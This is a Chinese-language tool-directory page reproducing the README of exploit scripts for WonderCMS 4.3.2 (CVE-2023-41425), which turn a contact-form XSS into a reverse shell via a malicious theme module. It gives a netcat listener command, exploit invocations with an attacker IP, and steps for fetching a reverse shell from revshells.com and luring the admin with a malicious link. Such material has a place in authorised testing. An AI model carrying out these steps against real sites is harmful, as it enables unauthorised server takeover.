Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/0xdtc/wondercms-4.3.2-xss-to-rce-exploits-cve-2023-41425
Payload生成漏洞利用ShellcodeWeb应用程序漏洞利用渗透测试远程访问工具
GitHub0xdtc/wondercms-4.3.2-xss-to-rce-exploits-cve-2023-41425

WonderCMS-4.3.2-XSS-to-RCE-Exploits-CVE-2023-41425

CVE-2023-41425 Refurbish

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
31年前尚未审核

WonderCMS 4.3.2 XSS 到 RCE 漏洞利用脚本

概述

这些脚本利用 WonderCMS 4.3.2 中的 XSS(跨站脚本)漏洞来实现 远程代码执行(RCE)。当管理员触发 XSS 载荷时,它会通过一个精心构造的恶意主题模块自动在目标服务器上安装反向 Shell。反向 Shell 从 revshells.com 获取并执行,从而使攻击者获得对服务器的远程访问权限。


目录

  • 前提条件
  • 脚本1:自动利用脚本
    • 功能特性
    • 使用方法
  • 脚本2:手动利用脚本
    • 功能特性
    • 使用方法
  • 注意
  • 许可证

前提条件

要成功运行任一脚本,需满足以下工具和条件:

  1. Bash Shell:两个脚本均为使用 Bash Shell 的 Linux 环境编写。
  2. netcat (nc):用于监听反向 Shell 连接。
  3. Python3:使用简单的 Python HTTP 服务器来托管 XSS 载荷。
  4. WonderCMS 4.3.2:目标必须运行易受攻击的 WonderCMS 版本。
  5. 管理员交互:载荷需要管理员触发 XSS,从而导致反向 Shell 执行。
  6. revshells.com:反向 Shell 载荷动态从 revshells.com 下载。

脚本1:自动利用脚本

验证演示

Pasted image 20241010021603

功能特性

此版本的利用脚本会自动检查 nc 监听器是否激活,下载反向 Shell,启动 HTTP 服务器,发送载荷,并等待管理员触发反向 Shell。

  • 自动反向 Shell 设置:从 revshells.com 下载预生成的反向 Shell。
  • XSS 载荷注入:在目标的联系表单中注入 XSS 载荷。
  • HTTP 服务器管理:自动启动 Python HTTP 服务器以托管反向 Shell 载荷。
  • nc 监听器检查:确保监听器在运行后才继续执行。
  • 自动发送载荷:无需用户交互即可自动发送载荷。

使用方法

  1. 确保 nc 监听器在指定端口上运行:
    root@kitploit:~
    nc -nvlp <端口>
    
  2. 使用以下命令运行脚本:
    root@kitploit:~
    ./AUTO_CVE-2023-41425 <loginURL> <攻击者IP> <攻击者端口>
    
    示例:
    root@kitploit:~
    ./AUTO_CVE-2023-41425 http://localhost/loginURL 192.168.29.165 5252
    

工作流程

  1. 下载反向 Shell:脚本从 revshells.com 下载反向 Shell。
  2. 修改反向 Shell:使用攻击者的 IP 和端口更新反向 Shell 脚本。
  3. 创建 ZIP 载荷:创建一个包含反向 Shell 的 ZIP 文件。
  4. 构造 XSS 载荷:生成一个安装反向 Shell 的 XSS 载荷,并注入到易受攻击的联系表单中。
  5. 自动启动 HTTP 服务器:脚本启动一个 Python HTTP 服务器来提供恶意载荷。
  6. 自动发送载荷:XSS 载荷自动发送给管理员。

脚本2:手动利用脚本

验证演示

Pasted image 20241010013048

在网站字段中使用脚本提供的利用代码...

Pasted image 20241010013218

功能特性

此版本需要用户手动管理 nc 监听器和 XSS 载荷触发。更适合不希望自动处理的场景。

  • 手动反向 Shell 设置:用户负责确保监听器正在运行。
  • 手动 XSS 触发:脚本提供恶意链接供发送给管理员,但载荷必须由用户手动触发。
  • HTTP 服务器管理:启动一个 Python HTTP 服务器来托管 XSS 载荷。

使用方法

  1. 确保 nc 监听器在指定端口上运行:
    root@kitploit:~
    nc -nvlp <端口>
    
  2. 使用以下命令运行脚本:
    root@kitploit:~
    ./CVE-2023-41425 <loginURL> <攻击者IP> <攻击者端口>
    
    示例:
    root@kitploit:~
    ./CVE-2023-41425 http://localhost/loginURL 192.168.29.165 5252
    

工作流程

  1. 下载反向 Shell:从 revshells.com 下载反向 Shell。
  2. 修改反向 Shell:使用攻击者的 IP 和端口更新反向 Shell。
  3. 创建 ZIP 载荷:创建一个包含反向 Shell 的 ZIP 文件。
  4. 构造 XSS 载荷:生成一个安装反向 Shell 的 XSS 载荷。
  5. 显示恶意链接:显示需要发送给管理员以触发漏洞的链接。
  6. 启动 HTTP 服务器:启动一个 Python HTTP 服务器来托管载荷。

注意

  • 管理员交互:两个利用脚本都依赖于 WonderCMS 管理员访问易受攻击的页面来触发 XSS 载荷。一旦触发,反向 Shell 将与攻击者的机器建立连接。
  • 防火墙/IDS/IPS:在受防火墙或入侵检测系统保护的环境中运行这些利用脚本时需谨慎,这些系统可能会拦截或告警可疑活动。
  • 负责任披露:如果您发现目标存在漏洞,请始终遵循道德准则,向相关方报告漏洞。
下载工具